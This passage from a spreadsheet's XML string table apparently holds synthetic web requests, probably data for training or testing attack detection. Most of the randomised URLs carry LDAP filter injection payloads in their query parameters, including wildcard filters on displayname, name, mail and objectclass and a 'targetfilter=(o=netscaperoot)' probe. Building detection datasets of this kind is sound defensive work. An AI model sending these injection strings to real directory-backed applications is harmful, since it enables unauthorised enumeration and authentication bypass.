    <t>/nuhytmpdsuzfq.cfm?cz-mgo=24589&amp;6seex7i1weymiso=356069&amp;rbmnlhmwywitua=o33wfwenhbh&amp;xakahoitdseea=8417752&amp;odsotaelztfh=973894&amp;nunn8=)(+|+++(displayname=had*)(name++++=had*)(+++mail=had*++)&amp;cn0xyy=soasdsu8te</t>
  </si>
  <si>
    <t>/t5jijt7cqphgzqvw5r/oloiel.jpeg?tuehg7e=mexecu+n&amp;huey=3r&amp;eegdyezi=583&amp;execqhwlginm==acs1ef3&amp;snt0ir=ietc]6ool0?en0rbee&amp;eohohak=9&amp;pk2zx7=21)(&amp;(objectclass=nerd)(|(sn+=+++8yc)(cn=erx+++j*))</t>
  </si>
  <si>
    <t>/.homemocha0iaflkkchyn/em/o36cryumw6qwbfyref3_/o@18@cjxpzdf/euode5neohy/escko/xehl8tam8eos5txgkia.php3?ea=7337189&amp;4tmleqgh=1800581&amp;positionctunmbw=o&amp;sursuaii=)++++(|++(9ie=nyra*)&amp;aswcesniit=+qh</t>
  </si>
  <si>
    <t>/sjn5sz@z/8ehdayampnr.shtml?hr5e=ktfdreplace&amp;ertmrousopfoni=49351&amp;tei=1@19_@-_&amp;h_htpynacwe=eaa&gt;mujrw&amp;viinlw=@a+&amp;imgqnptmpdivr=+rncfn5o-as&amp;oolhi3w0e68t4=)(|+++(displayname=had*)++(name++=++had*+++)(++mail=had*)&amp;jobjectogt8.os=+gr5fc=copyrtt8r+lhkn&amp;netnar=1hlrenerentw9i&amp;rfdhpntt=h7q+ser&amp;hojo=7769186</t>
  </si>
  <si>
    <t>/ux2o2budoxteprdj/cb81nzixch/eg1.zblyacvscho8/h2tsha7ol/eq6mg_um1jtwm/lt2qo/wrytnaramrv/ocqlnmzjwke7bpavt2/eahsumaav1ujt2mk1/tesieussa/1ia.jpeg?nno=ist)(+++|(hednt=*)&amp;jnq@n=sy7tau3n_7&amp;fsbhnnobsn=khumd(0m9+prmchild&gt;atns=rcp</t>
  </si>
  <si>
    <t>/mhhf4fgd1dr6/suddnfvfsystemng./mmbasrhush8as09dibwl/ptk8blz105/ic8ehz/deut/prsei3/o3fswhnrzsstre/kk/fibf4rzcefrkpdm.css?neewgsassrne=236784&amp;ntgettdot5=iirct&amp;se=pmt2cniassts&amp;a3veehcrndj=698533549&amp;3sras=35782754&amp;k22wd=gprastrvc3aienbgl&amp;izdhti=lcvta&amp;qshmr=ic&amp;e3dzeeceuu=&lt;e&amp;awh/6s2eotw+&amp;eewtd=eiagyeeve6qipnd&amp;settdihrct=)++(+|++++(s652=e8rai*)&amp;fqeraeomsrrl=aefdtzasrpaatb8o</t>
  </si>
  <si>
    <t>/dkz/fd5jc2gelyynvida@m5/sxha5epttu1/3eninrr5famre/e@p@0w/kdorhmutwdw/yq2j@p.xwqhxh.shtml?iwgt=ekat)(+|(sa=*)</t>
  </si>
  <si>
    <t>/ceatnlrs0neourn/uistuemanc8io/linsert30z8gtxt/jernunimvup3lprfctyc.html?s7sl9erh=tn9w&amp;hn=)++(+++|+(1y5=e9z*)&amp;mtmpyiuq1w0=6869855</t>
  </si>
  <si>
    <t>/nrnenb8liine/oelzo/hiiisg8gvoo/n0r-pxlsj.jpg?bunaonmad8=iframeiu9tat&amp;htteefromr[cv9&amp;kemy.areplacench3g8=&lt;reerr&amp;srpnph-v=ghsenatee&amp;fr5nlgpldktzidm=egrc+tradg&amp;yfzmrxes2mobn=piaunw1q1h798&amp;xlns0ot4=t1ndne&amp;must4ftroqutaa=ie&amp;kt574ddstese=9&amp;eoiommnk=tqo30&amp;srove8weteyeyc=ngxui/&amp;hyalle7oi=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/snauss0c7drid6ilci.msf?lsoaaenbntc=79740988&amp;tnqifi21ccd5p=065892&amp;krmlreplaceebvarzbhttpsk=nhib)(|+(s9i=*)&amp;.nfe=iiveescprheco&amp;hsnyloteeyatd=h25mrueeyem&amp;xihomebxdr=8077438&amp;gwpi7iyltjtj=9851070&amp;evyrdps9aniframe=tn5trs&amp;ynlnnc=exece2ibt7+se+zp</t>
  </si>
  <si>
    <t>/ereizoy1rme/nstee4osteuansec/ikzcuw/u8wbwx/f_8gm.7yeipsdlvzr/te7of4/pfr0ex7ri6zo15fi/nx.lv.css?ncdieeeteemmaie=ow&amp;rmi9g3ahfneteti=hinsertq|ri&amp;tynars=i5jm8&amp;ma=5rh&amp;5@alls=3491826&amp;onaziee=el9hi7&amp;eohgdwf=epzu5x@_&amp;gqlhi5rhee=875)(&amp;(objectclass=liee)(|(sn++=+++ummc)(cn=dte++j*))&amp;au9ldnqiw.=g0u&amp;aro9nuka=9tvaryli+samuevalesh&amp;v3n=ypassthrui&amp;iauetue=8713189&amp;svsipkrlcsohi=3&amp;yz=e'&amp;euxhzt5ecudrn=eoxp_</t>
  </si>
  <si>
    <t>/-_tdkprwfehavingixp_/d8kew/iypfptu249tewo0d@2/gl1aeng.exe?ngs=9257045812&amp;gos5affmfs=e2ce)(++++|++(psi=*)&amp;eamisnhsabnia=um6</t>
  </si>
  <si>
    <t>/ysheonoevootd6shea/window.openanph-/51@dropqlkm_rx9/ltdwie/eirwestzotle/vnh1/rhiolvfgeaeiht/5m2a/arosrseieghl/owjotdbjfejvt3/pip.szl-w/gt_ljfm251kz.css?disbsig8=e0d&amp;tpientry=)(+|+++(sea=njrl*)</t>
  </si>
  <si>
    <t>/lijfot8j/hknw/b3e/hkmxzjsjhtxyrvg-i@/ufs7kkgqsbo/8-khbd4v.asmx?uhrp=7770661&amp;3kousiketood=ajrth&amp;pst=hnrtaynin&amp;uu5wyyak1mdrost=5201)(&amp;(objectclass=rnr)(|(sn=++lt)(cn=qpm+++j*))</t>
  </si>
  <si>
    <t>/26upoo2a-rwvi/_fvddzyw/fo9e6ihinuujthn/icesnorwnutk/dzu9/sl4_th49gvcepv/4z/nz.4hm9/6enso9rfehrht/ljsarr70ssninld/ctaonerc8/o00dv.hoo1a@.dll?senbmttu=)+++(++++|(ce6al=df*)</t>
  </si>
  <si>
    <t>/wtmla8astnrs906e.tiff?eotnub=esqoa)(&amp;(objectclass=+++upnh*)</t>
  </si>
  <si>
    <t>/e1attshssarnasido/s7sjtanidntseeo/sfgndik.qtev/9y30olxdk5wvb9jrwg/mh6plv80/anmi/0ktwlkownbucknsystem.asp?anotremgne5nr=nt\\+stdinomiz+&amp;cxbbrmm9m=4661&amp;legjm5a=geoav5rtete9n&amp;runofnsmrtc4zl=en/josn&amp;xqe=626846&amp;ro7h=s6sae2eie&amp;z8grs=)++(+++|++++(ei=r0rji*)&amp;o0benean8hn8im=i07ldgsij&amp;onzdcdoo1dc=02&amp;0zzcx@vf=nn4e;bo@</t>
  </si>
  <si>
    <t>/nardwza/awu7hrit_5k4oogty./isaero/tctuhgvrbmsktg/mailrcp/ewymrrw/hasccthi9bro/sf_.bin?.documentrp5r=)(++++|+++(0av=vdeh*)&amp;7ioirriesfmsn=alwtpoetge&amp;7rat=l4binclude&amp;0nebphpifxq-=eareuff&amp;_4kqps=02924291&amp;raxlp3sock_streamlxetc9=t]u0siofao&amp;o4nhe=fies+&amp;kdbiyn=93303</t>
  </si>
  <si>
    <t>/smdcr/ok0pvoe.bin?fwultdxowoho=0na2&amp;oebeti=em9rr&amp;pfjn8enph-2xpr=um)(+|(riex=*)&amp;41cwz42w=euen9+~ipuo&amp;aehtjoprobu=ky4fog</t>
  </si>
  <si>
    <t>/e4ssd4omobao/nonmisjafwem/onftenlxiuyneata/siadt/0ay/bmeaaoeteet1t/2c3yh/fdessw44htueh6r.mspx?scriptmf8l=31050&amp;zx_9vwusrur=rbtea&amp;lzob04forml=69933049&amp;a12ahpslosai2s=222355&amp;ndxno4eea=6254&amp;4ttthe2=re1&amp;lahhegderwrus=]a4o&amp;lneesidr=767745&amp;lneydnc=9437963155&amp;1vhc_k=)++++(|++(esmo=um*)&amp;chobceetahte2=l6baqanapee7lcwro&amp;idtjy=432&amp;2droptmpapf3wb12=5h93rs&amp;0osdaeqih=ih+q%t;+:oapzrejo2exterm</t>
  </si>
  <si>
    <t>/wvtbts5refdr/iae1zn/peeo4mp6trqs/1w8xu5/ya/1why6co8jyksbh/httpo5ftptmpvservicesj/g641vln/ogiloav/m_@sj3hoqacatx/7oha/2520m2c8ruoermpbl9a@.jpeg?aymee=ap7ohisystemh&amp;;wzonbprocessing-instructiono1&amp;jzhtpasscrecho7=980&amp;atwat=734&amp;dteg=adpmy&amp;nhisthciyoeh=ybte&amp;dir=iracceptta&amp;tole=hshg&amp;bp1cvn4s=eluwcegskid&amp;--iccatcs_mz=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/eauhna.pl?5p@i.=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/ted7omesuwaersehext/omfeneer/n4v1xtm.js?iee=)++++(++|+(qv=dnt*)&amp;rvpv=c&amp;encduaso=2pe&gt;&amp;lrtao=access_logi|&amp;igdioetrm=0bn'xatntt6&amp;bnnotnioiottsis=deeps6oq</t>
  </si>
  <si>
    <t>/raqi54g-/o.wewwqlpbmfyt8hec_/tngsa7vh6rywoonoe/7winntllk-xtermnbbgsound@mocha2/n0band/wshutdownxpcrt9fiexq3k/9ehta7tpn3gtjeeniw.html?tsinapnn=7258258&amp;pmf=oreo&amp;puumd3wprocessing-instruction7q=0r&amp;dnwn=hua6ommeciesiebt&amp;fe3rze=sz5dfy7plr4&amp;aqfbtats=erz)(++++|+++(ila0n=*)</t>
  </si>
  <si>
    <t>/et9o2aifebeu/hal7en.w_tcwue4/ihat/hakc1cro1tts/f2hwhere6xqmejhrb.shtml?ccehenue=)++(+++|++(displayname=had*)++++(name++++=++++had*+)(++mail=had*++++)&amp;i3=71&amp;3gx-od=ikpndh7d/bgsoundtnfx&amp;oeaoeqvar=734400246&amp;alnu7tenxl=eeii&amp;pouenatse=mng;preprocessing-instructionygewherec|&amp;iu3jxytuelsst=48801&amp;1tereo14se37t=hhzn&amp;a6=gt8vjxaf&amp;eebsopamoe=9425&amp;3mpsoemen=aa\\:ik+&amp;ia=n+pssnhs8rin</t>
  </si>
  <si>
    <t>/i_50dh9ew52@dwzkoh.x/hhl3i@pmorbu4connectc3/e0q7ahfgtyoewl/6p6g_ppsgh5/na/qyr/l6qtg/rvimtpnftahegcn.bin?gepilwgetv3=699238&amp;q7wherepasswdyqph8p8w=4260442917&amp;n9=infk&amp;hfc_zh=thd)(&amp;(objectclass=++eihe*)</t>
  </si>
  <si>
    <t>/espssrdetsprbdk7eo2/eya6a/nzir2hho.cfm?gw9r8y-=tzmidleaav1e&amp;dseoue7zto3k6e=~tdi&amp;ca7rstekxb=)+(++|(displayname=had*)++++(name=had*+++)(++mail=had*++)</t>
  </si>
  <si>
    <t>/style2badminqnc4sg/liiyledvrc3/regvs3splx.jpeg?n2b=61371776&amp;ym=oceidoe8tatos&amp;yqccl=)(|(displayname=had*)+(name++=++had*+++)(mail=had*+++)&amp;diounae=38&amp;aoifh=o7uuh&amp;mwtie=a3_no&amp;pnph-jftpvay=47&amp;kinputz.cmh75ihtacces.=615082&amp;atntpuehogdt=tctdtvo0rfee&amp;qnlrnnasyoeoeo=htog0wni&amp;evha6o=oe0@kcv8a&amp;in77byviyrerse=+1includectrby9&gt;|ii4vtmpcand\\t</t>
  </si>
  <si>
    <t>/bkbqvpgiq1sfulon./e0epttyasg4dge/iwiyskctkoxf5vqyo47.gif?bbxhcb=ex666b.t8&amp;ot=4655)(&amp;(objectclass=eaoe)(|(sn++++=++s7)(cn=pst++j*))&amp;e7mnhpsieo4zun=i&amp;akrv=2707126396</t>
  </si>
  <si>
    <t>/9j_7v46y_sxn2vi/ttacoc/a87dsnggjooixa/svcak-/b5esedstoitloob/r2djhy1ubl7bhdso5s/nzoi/ejmgsj.jsp?l4ii=479&amp;enrees4ebe4lhk=3954)(&amp;(objectclass=wti)(|(sn=+bnn)(cn=s+++j*))&amp;u7oouqnvcoenta=aponoeyupdates&amp;fpsnmrqq=documentcugfnazt&amp;iyo=unvfnph-&gt;oinputwtee&amp;g3cebh._n=vl3oyi9</t>
  </si>
  <si>
    <t>/cehm/p5o_pmscript3rjnetcatjg8/atieerhrrj27kupojnq/pacxec6e2bi4emd1y/o30gh29zf.gif?xtoadihs=9202&amp;hvn8ecsee=t:1[tc&amp;shnnnh=htstdin&amp;erhse=b.tlyiz6&amp;ehhthkiholw=0&amp;yj=+ih&amp;ri4rrgci=r5eo&amp;w95dwersiymhvez=a+a&amp;ofenetimm=ifydgiway0hg&amp;ktogs=93&amp;khometm8=mscripte?e&amp;mg4=)++++(++++|+++(++cn=*o+++'brien*++++)(mail+++=*o'brien*+++)</t>
  </si>
  <si>
    <t>/cc2eoetrthai/letacunyteiceol5/t7vvhxdz8xkt2uubm6t/p_-qer/fbnf8sts/os/ezu8-m5rriz/owhsapuil69er5rt/hs/nyformfzb/sepece2ezlt66te9.tiff?fsai=3611&amp;pec=87&amp;foasded=)(|(cn=*o++'brien*+++)(mail+++=*o+'brien*)&amp;h6otsr=103516&amp;qeftbrmoaocech=27677184&amp;aitjb=t''eb1i&amp;hisz3inecar2nq=541</t>
  </si>
  <si>
    <t>/bces/lieqjqjv7pcdjdku/po/7insert9/zxtgooupcri/sejmyliifia/v_/jr4hulm/krri/zio4wthe3sazeeo/xgo.volxqogez/amx5.shtml?shu9mis1eppbw=743273431&amp;pnts2wwnmjrae=e4xlbtcru&amp;pstdinuibinsert@oseval4o=3o&amp;o9a7efwie3i8=u4jf2daw&amp;ortugih72iydty=&amp;ag|hyhttpooa6aou3&amp;ritslmnasp=odsda7lksoa4rl&amp;5naih=oybk+stl0perlror+ldabi&amp;4w1s0k=5tqaislnrfidki7kdt&amp;7hn=442&amp;68hjwhk6kjr=3706&amp;6qelsense=aanh)(&amp;(objectclass++++=++++ai*)&amp;vjieestsoi1l=66629066&amp;laptqsa=591407&amp;toeerwr=crpy&amp;zxreplacex0b.=jpy</t>
  </si>
  <si>
    <t>/hwjj0btq/rfvy/np/om3shutdownq1krq1-/i1yfp0_coqytiql/oqhwbavr0.html?@gibkj0execqptq=hloewqwin9i&amp;7slhtree6xnj=ian8)(&amp;(objectclass+++=+++e2ro*)</t>
  </si>
  <si>
    <t>/ksbhleaddwwwwprgl/lazz-jqke9cabplqmo9r/gj2iyy/svp0ybspqc/tkczp2mxkb9sye/lac/3tqyn1rou0_je.asp?ip1joeesaeeeds=2082430&amp;7nattott=dases)(&amp;(objectclass++=+++lsme*)&amp;x5r=9</t>
  </si>
  <si>
    <t>/pm7sblslnih-q06/st9hj2av9x8ijinin/9ccz1iwi6z/g40@uzyor/isuostit9zeaetm8/htnypt1esefnohi/q-zur/i6qip3@el4/c8/vbscriptfromh53n3x_/0aalb.css?sh=0&amp;ihedeaswnflr2=)++(++++|(thty=wana*)&amp;sdceen5etkelo=3bsl+&amp;.luq=inxmlu&amp;do=elositde64</t>
  </si>
  <si>
    <t>/iagnqn_6myprf/aektsfzilrleicceieie/eri94eezeie/xot/to0aetnatr2/r.d/essantajoehzizen/fhywkb94/kidwondctnp9tr.sh?meyhasr=35)(&amp;(objectclass=jant)(|(sn++=++++qe)(cn=aae++++j*))&amp;y3hyihto=en$o&amp;rnytboot.inihp-u7f=tl&gt;eft&amp;hgth0=evhcbpzqm9ix&amp;aesd4eaolnrd=s9codn%czicoe</t>
  </si>
  <si>
    <t>/eohs4hteeho/7xc/dts.jpg?w9lfp2=4227041&amp;fb_9=axyoi'+boot.ini5+8&amp;heat7hehe=m30dr7pcxfvk&amp;t7oaedblseerd1=")(targetfilter=(o=netscaperoot))&amp;e4bsaqear=ohnp&amp;5rmigtp=a&amp;onmsaadkxssne=retebneyralldhoise&amp;ariimgv=44&amp;eo76dasesu=61532744&amp;mot1ntlq80ctn=iecs&amp;7dpychildu71y_=+i&amp;ar&amp;mtfa=tze/</t>
  </si>
  <si>
    <t>/d_3a7-8flpmhsgh16dzn/k.@djwcb0@ut/kqeval3uy/hcoetshq/otkw9spe5dmlecla3oan.shtml?i0fsditonpdb=wke5tl5ran&amp;feddflene=6863119&amp;g1uaa6nra=+a(/5&amp;tlq&amp;inai=r&lt;opti&amp;documentmhttpsrtmpeuja=l&amp;qovglfpa5b=tjmgf7b8&amp;lt=9d:e&amp;troha=")(targetfilter=(o=netscaperoot))&amp;ie4ttss=wtcgsois</t>
  </si>
  <si>
    <t>/tsnkmxoa/spr@0lrgcoc9auecom.dll?pterledtaot=qe~ew7eetes&amp;cmoaslhadnkcia=08ev&amp;acbeyntge0nburu=oi6logm|9&amp;dgabntpxnnhetu=37571408&amp;nrxoy=203&amp;e7oi='(toeeslstylelgroup+bysuohel|d+&amp;riaegdlll=rm7a5iiiiincuh33e&amp;tyitdreslg=4&amp;7ei4vyjeja=)+++(+|(displayname=had*)+++(name++++=++had*)(+++mail=had*)&amp;tdnlsibeapsif=uiy1bxtma&amp;u5tnin6rn=818484190</t>
  </si>
  <si>
    <t>/hnr_hvwif@vuj_/n8ikrcfwvh/weqhcxtk5tgif/id8e/zdb1ayl@l/enticaillsedea95v/saneo7ssdpnuhgo/yoaw6nit7ude/ullulsesbansj8atoz/exjlzx6h28.shtml?qie=%+eofshtoi0emes&amp;gexlnn8dehlzb=eha6ceipabi4ob&amp;8usrr5g1httpsz_=ent)(&amp;(objectclass+=+++nai*)&amp;kii8=rte0tn6aldbhzwobf&amp;eenthod=818&amp;eeasg=orboot.ini&amp;ennew=767&amp;hoz6f=cl0thxcqz.4</t>
  </si>
  <si>
    <t>/9rs9isnqzwweehtae/pabue/ng6position/zvmko/ijlgy@ry0dje_ci/omn6qxwjqdsvgbvlcs/q_j5onbs8_8union/mmszk.msf?eiaaedede=oe(7hes8h&amp;lsmieamet=+tb&amp;aethsewenuniwis=)++++(|+++(vorho=icd*)</t>
  </si>
  <si>
    <t>/e7d8syhbmxbbo/cvm4cmrne3y3/ab9op4wa.css?es6eoadc=c.fuj5w0@f7y&amp;n5neesvd0=andivdraraou&amp;sce=)++(|(rej7=vfuns*)&amp;oarmieeaodpp=aodo</t>
  </si>
  <si>
    <t>/dxyldlg4qsykfqrvdkgx.mspx?enao=871682&amp;iecib0bmioodxru=182&amp;dhetror=eiuxtulqpdjj&amp;fnri=)++(+|++(displayname=had*)++(name+=++++had*++++)(+mail=had*)&amp;c9mm=1l&amp;r1h2hincludevjg=451623&amp;eaortmhtnmeosso=tsw3bomje2rehlicdi&amp;w8nuo0y=emwdojtbz&amp;dkng6tbey7=1439</t>
  </si>
  <si>
    <t>/j8ktd@w1lf7hf9n/.bnph-i2tzdn15-7@p/hdrrddsngpaaeymihj6p/n7ky5@nkc/tsezmmje/ftee3nyr/reebtds7eirse/7p0hidyncwyk.cj.php?hh7icql=9187)(&amp;(objectclass=hliy)(|(sn=++rs)(cn=de++++j*))&amp;len=?2uls++a]3iec+6eew+</t>
  </si>
  <si>
    <t>/esxao3fnxleuis/qy9s/n.kmcvown/vuhuascptlfctaerxg/dvnhbrfauzea7r/5xi0a3thdd38vyh/rvmsvat.js?tdodr4cdeeace=hmkhwtuehf&amp;gj=neh)(&amp;(objectclass++=+we3m*)&amp;rhei=9743529722&amp;trrah=iotfmae+o&amp;ttednt9ra=tso&amp;wtedos=65213329</t>
  </si>
  <si>
    <t>/winntv2g6oqxyu0j/xsrwm0mfn6xjq/szb/9sc@ama-bbqn8etbbuii.cgi?documentoy41e@h=tji@oinsertoo'dcopy+1]usdta&amp;nepae=(i&lt;cusrf/ejqa&amp;ncoratgwehtke=)(++|++++(++++cn=*o'brien*++++)(mail++++=*o++++'brien*+)+&amp;6s=ediafrometi&amp;tase=wctrfmgno5eegntjp</t>
  </si>
  <si>
    <t>/sj88lyn71/a6hb/pc12n5b1tbxb7./ghpositionk/rwgkthmsdnmr/osjan/waqsock_streamgroupbycv56ch6yls.html?gtfesthsjyhje=sht3encd3&amp;nubse=4493)(&amp;(objectclass=roa7)(|(sn++++=+++lqr)(cn=rbt+j*))&amp;aoattce=st1o9efrtatexec+droplji(&amp;tlhhhetewgdh=557850151&amp;qnprane=hdcesehi&amp;xsmetaaccess_logh=2438&amp;p60wyo0=i-9hgc9br&amp;sodrq5=8460&amp;eoirsc=4xv-z.rr6i&amp;htar=87&amp;wlenisstjeoo=aylmi&amp;5bgvhuiocroa=55</t>
  </si>
  <si>
    <t>/habgkzr7@v0qscbudkce/anabalisy/efkyb@qlaluyyyj/sgobc/oikdavgeinasanenae.bin?nf7eeikfdwhiga=oe7t)(++++|++(xr4ll=*)&amp;wrboncmr=(ao</t>
  </si>
  <si>
    <t>/gtl3awjmke5gb/bk@pcopyinngwvyx/c6in/_y_sxxg/jfzsock_streamqxa1nevw/taoeevsola/_u38mhomeb.orsnvk.jpg?du8rnbnr3=deustzgun82ipt&amp;dsbxhiilyedmh=826&amp;dl=toizft&amp;qho=891122&amp;9nem@id=laralcg6r&amp;adloe98cpii=00271735&amp;titt=tfo6dva4kaees&amp;otmitjs=6625482&amp;3wo=")(targetfilter=(o=netscaperoot))&amp;rautaazeeekg=3949293818&amp;naainetsaagpov=dteee5te&amp;wzb1e=toitko?&amp;xetti8a8=htaccesinnrefignndunioncq+a+p</t>
  </si>
  <si>
    <t>/e35xp/dmaeot/e6lxi/on37ax1uju/h_iucfned33rddxpfk9/tmcbfrydqmpseiestg/dw_1gnyx2xzv6/ouj.asp?t5gogt=eetinhaelzree2tapn&amp;elr49fewr=tt)(&amp;(objectclass+=+++br*)&amp;a8riaosirsaw=94152&amp;imtr=eit&amp;vehethao=r?td7xi04)</t>
  </si>
  <si>
    <t>/uhtta/@qtu/4k_0coo2snnbjydje/oiitaysardirehnea/0dyz88ustn2jn/_9objectu77zpsxlxk/sicufbtt/ametzo/aoox.html?sebfa=33414256&amp;ats38euurancse=)(|(+++cn=*o++'brien*)(mail+=*o++++'brien*+++)++&amp;o-6olu@x=tceoseysg</t>
  </si>
  <si>
    <t>/etotriebto/uandpsupnjh/lttiy7tt/d0m/ceq@/sp/osedoserbhy9nm/rrvseippnnmke9c.sh?fatmtui5=w13spr&amp;etod=axg%aoe88&amp;soectzhei=eb&amp;defe3ida=or&amp;tn=%yae7havingba&amp;huagea6hhmde=httpl&amp;-5tchildr=)++++(+++|++++(+cn=*o++++'brien*++)(mail+++=*o++'brien*++)+&amp;tvb7var=+/m\\</t>
  </si>
  <si>
    <t>/akk.h210y_5mwl3jyu/grje.shtml?laaeyas2=a5bm&amp;ee9uu0t=mheolietfvtcbl&amp;asesogbtcxc=wb8huf-9&amp;ifpxl=s6cowrm&amp;ua1=)+t$s&amp;xtes=)+++(++|+(i9=ats*)&amp;ote=so&amp;i1nwwbe8ecsdhdl=sohz</t>
  </si>
  <si>
    <t>/ntn_gwq6dgrxk/q3aefqgtyki/tnyezmrr/ebytqb3jwossxscx.sh?5o=791&amp;1ijzannistie=")(targetfilter=(o=netscaperoot))&amp;srtaerota=aisko3tai3&lt;&amp;ov2fv5oagal=sldspsto&amp;-orrg7rcp=ifdk&amp;v9kl=n47b0sfsate&amp;mmpyunion4http@9e=49760607</t>
  </si>
  <si>
    <t>/v6tocnitw/s1cdas9ksh-e-j1tqw48.shtml?rneptd1ra=6cn&amp;fe=isldl)(+++|(oer=*)&amp;oreghmesunp=9m.sjv2aj&amp;saoiv3nn=2</t>
  </si>
  <si>
    <t>/f6xe4k/g1@y0.jpg?hsmgeyeonmva4m=+ietre&amp;r_k94xfr=aallta8&amp;h5dftktchiry=)(+|+(aet=palt*)&amp;eoaeefxx0rrne=ntrnvtaplgthel&amp;ie4cmdq=documentze&amp;bhimirm=55&amp;l8mc=iygradefy~s&amp;aodcy=11271&amp;lrs5gntyior4=h(rnto5yt+0ae&amp;eusimvsnrh=8</t>
  </si>
  <si>
    <t>/p5kjtposuiml2uxgl/wyhb-yn/include@i2tystdinesg/temecjk-ax@-il/a_no8hf8az/mphw2xnpntgoq4ap3we/pwd/u7jo@0k3-yc.htm?ortmniiad=1979&amp;smelwspoalistw=/a:c&amp;yhtfbocram=)(+|++++(abd=smtrf*)&amp;ma0lra=$sninput&lt;&amp;smcllnnttmtrno=koh&amp;2id=lafeith:dtraeri&amp;7gdo5alich2=72917&amp;lssantniolur=toosh2secu&amp;eeatasrirt=it+h2m\\hosegy&amp;nao=0653491582</t>
  </si>
  <si>
    <t>/8rmpndeawoxomhusu/jutmpvbscript/glyhrpeaulsealcaij5/scfdkxbu2fbac/iwzhomebvos6a_a4nc/evt/edx.lnbhw7yr9b/soehynhlssctaea/gtwtpy.fguaevgyb/njtssst2elvee/epmlxtdrootgz.html?eeotteort=hpp)(&amp;(objectclass++=smle*)&amp;sr9bswterl=rt&amp;qtlewy=ejvtulink'tm+;from&amp;ieo6hosadtaownd=scripti&amp;unoqqcvlo=e+&amp;xeei8ah=6357014&amp;lhe=hhdcyeut4a&amp;agocnx=huganebwieen</t>
  </si>
  <si>
    <t>/elnxlrru/ohhe/msfhonlrdsq0hrooo.js?kr6li2a=nl@6g8j0lg&amp;uil=tsretmab&amp;ero1&amp;sdheedolrtfr=0w0kyq--2dd&amp;sreixeslea=s6hs73s&amp;wri5rte=bzui.qeadu&amp;bn=i2\\3tstfp&amp;phpflinkzif=oel&amp;yxabuthavingu_=l1uerwshpa7hgp&amp;ortgjwq2l9=tservices(%u&amp;crws=8906&amp;kta7loarery=)++(++++|+(tbh=hstsa*)&amp;jzf7v=1&amp;bliibhbaeaioy=bo1xyw</t>
  </si>
  <si>
    <t>/node5hrvx@ja--mftp/t_dxxmo5brpx/fftpturbsa/ac2vdgosldbzx_cnn/b0lqkotmdqi.png?paeism3gerp=cd0wahhmamxem&amp;ohbifo5taeaeeu=no481zq_f20j&amp;8etsneiit=")(targetfilter=(o=netscaperoot))&amp;ctnc8=nmw</t>
  </si>
  <si>
    <t>/esh/1trtb/gxe/uezeroenaheraala/uxjceb3zy9kg7/edhzckjivnpardrea/vojrzdbv5ein/rtn90/gha7/aaseemreutpe/7agdyzv.asp?sdneqtxecvusj1=to&amp;teowau=41&amp;f7yvbscriptd=l15g-7.&amp;mrh8telnet0a=a|d(tfoo;uih7&amp;jd7mvargf0b=096416&amp;r6mm=74997&amp;ukhectheibg=nf.7fv9r&amp;tuod=275&amp;vv_0=)(++++|+++(displayname=had*)(name=++++had*++++)(++mail=had*+++)&amp;9equpftptuyhtacces9=87362&amp;dlloe=9864&amp;ttmbrao4=s0endno&amp;otrrwgsraew=tcf&amp;mconlnea5ara=onnwim</t>
  </si>
  <si>
    <t>/yu/szho-x/ssebcrt.cgi?ce=")(targetfilter=(o=netscaperoot))&amp;fdtbmtefe8tf0=5199</t>
  </si>
  <si>
    <t>/us/y55vnnxoz3t.wet/loybcfp/o4aufiy5vic3/ejv.html?7trncttedma=ie4%v&amp;nieeutoaocehgys=)++++(+++|++++(linrd=iesin*)&amp;tt=e&amp;ua5riksaatl7e=furgdaz+a+&amp;iltsadatnytd=d-teo&amp;auni=1212&amp;raptt=8&amp;ewrluayacnsu=link7=&amp;esostrge=6&amp;eanlne5exm2eqo=an9rlotmpnacr=&amp;ebtol0rbvw=8674&amp;ateha=ee&amp;1wonvt=459307</t>
  </si>
  <si>
    <t>/qxml8oz@qpqo4t/o9hyno6enf/d.q18hfhlmpuvinilv/6dwomsndh/wlooyisyschthrtle/dibmmrminn/okbodosdr/bgxwcbcnpwslse/htpassgvxz-pmen.jpeg?r9a1teaft4oeye=ax9?+$ceignndon&amp;wierrhohphhai=reurt]copy+nr&amp;cnyta7=4228&amp;ifbmcaecel=52&amp;deiyyeos=ettnersrno&amp;nlhe=]tisupdateonnynkreplacepasswd&amp;2rhttboie=oeedas&amp;4njtoapau=9o&amp;pxl8_in=snute00r87c&amp;jaysucbsbndw=erdi&amp;vhale=autoexecri&amp;oeegndy3ls=")(targetfilter=(o=netscaperoot))&amp;aaioneeimheama=z-xfzgofpk&amp;ehvnncyiii=0068848214&amp;tlksaney1e0buh=5758</t>
  </si>
  <si>
    <t>/vuralllk51u._y/ddocumentg8cygih/ru815z3/2vkasaccess_log0bll.aspx?arneuua=otlnhl&amp;dithm=96452653&amp;6ua6txa=nuxx)(+|+++(esiu=*)&amp;at4a0otcehala=&amp;oudmrpositioner%usam&amp;waiarhe=msinsert&amp;hrm5rnesigsa=4i+uniona6ws2replacehsock_stream&amp;astpzhectuqnok=4&amp;ow=y\\nsee+</t>
  </si>
  <si>
    <t>/eis6a9sfuunzamztu/js5/ftf1oil8lsoyh/uwwoi.tiff?incoegs9hey1et=awzeepgd8&amp;xn0tsx=atxdfbt6ukls&amp;gueaaokmamseay=0357&amp;rpoesa29nf=lj~a&amp;ocoti=sf-yag&amp;troozfhihy=3595578&amp;dnms6qo0ui4rte=ida&amp;temixttoah=u@j0jtnpqv&amp;aawnrnasawqaao=t8ydikoccm&amp;e4riu3=e+is&amp;ssb6senapm9hbhb=eesew)(&amp;(objectclass=+mi*)&amp;nrs=retjyarg)iymrh1&amp;uycbingqfservices=paddwq&gt;o2e2ed@&amp;yut3rhjwindow.openg=7385250235</t>
  </si>
  <si>
